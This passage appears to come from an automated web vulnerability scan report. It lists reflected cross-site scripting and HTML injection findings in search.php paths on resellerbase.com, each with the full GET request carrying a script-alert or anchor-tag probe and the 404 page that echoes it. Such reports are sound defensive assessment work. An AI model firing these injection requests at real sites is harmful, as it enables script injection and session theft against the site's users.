<p>The requested URL /resources-information/ebooks/themes/kosmos/images/reviewa445f<script>alert(1)</script>9167522d4d3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4045. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 994b5<script>alert(1)</script>bbbe3551e3c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/review/search.php994b5<script>alert(1)</script>bbbe3551e3c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review/search.php994b5<script>alert(1)</script>bbbe3551e3c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4046. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3c236<a>4ae58f4668d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search3c236<a>4ae58f4668d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search3c236<a>4ae58f4668d&opt=2 was not found on this server.</p>
...[SNIP]...

2.4047. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f9297<a>588d8c2b285 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...f9297<a>588d8c2b285&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...f9297<a>588d8c2b285&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4048. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 67213<script>alert(1)</script>f7cb61dc267 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&67213<script>alert(1)</script>f7cb61dc267=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&67213<script>alert(1)</script>f7cb61dc267=1 was not found on this server.</p>
...[SNIP]...

2.4049. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 83baa<a>d949e661b41 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=283baa<a>d949e661b41 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=283baa<a>d949e661b41 was not found on this server.</p>
...[SNIP]...

2.4050. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2356a<script>alert(1)</script>bc955b5e20e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information2356a<script>alert(1)</script>bc955b5e20e/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information2356a<script>alert(1)</script>bc955b5e20e/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4051. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ddc7d<script>alert(1)</script>7f0eb0f124b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooksddc7d<script>alert(1)</script>7f0eb0f124b/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooksddc7d<script>alert(1)</script>7f0eb0f124b/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4052. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d356a<script>alert(1)</script>816c02229a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themesd356a<script>alert(1)</script>816c02229a5/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themesd356a<script>alert(1)</script>816c02229a5/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4053. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b713b<script>alert(1)</script>6b1da1e080 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmosb713b<script>alert(1)</script>6b1da1e080/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmosb713b<script>alert(1)</script>6b1da1e080/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4054. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bbd0d<script>alert(1)</script>c2ad9d893d9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/imagesbbd0d<script>alert(1)</script>c2ad9d893d9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/imagesbbd0d<script>alert(1)</script>c2ad9d893d9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4055. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f1b50<script>alert(1)</script>43b01012cc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/search.phpf1b50<script>alert(1)</script>43b01012cc?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:54:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/search.phpf1b50<script>alert(1)</script>43b01012cc?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4056. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f9aad<a>fb2059607b0 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchf9aad<a>fb2059607b0&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchf9aad<a>fb2059607b0&opt=2 was not found on this server.</p>
...[SNIP]...

2.4057. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 14805<a>fbc4f161a0b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...14805<a>fbc4f161a0b&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...14805<a>fbc4f161a0b&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4058. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 45a95<script>alert(1)</script>54d78fd68f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&45a95<script>alert(1)</script>54d78fd68f4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&45a95<script>alert(1)</script>54d78fd68f4=1 was not found on this server.</p>
...[SNIP]...

2.4059. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 939c7<a>4c01e7c2e94 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2939c7<a>4c01e7c2e94 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2939c7<a>4c01e7c2e94 was not found on this server.</p>
...[SNIP]...

2.4060. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1b68f<script>alert(1)</script>5bfcb749a59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information1b68f<script>alert(1)</script>5bfcb749a59/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information1b68f<script>alert(1)</script>5bfcb749a59/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4061. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 52124<script>alert(1)</script>7e4752a9729 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks52124<script>alert(1)</script>7e4752a9729/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks52124<script>alert(1)</script>7e4752a9729/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

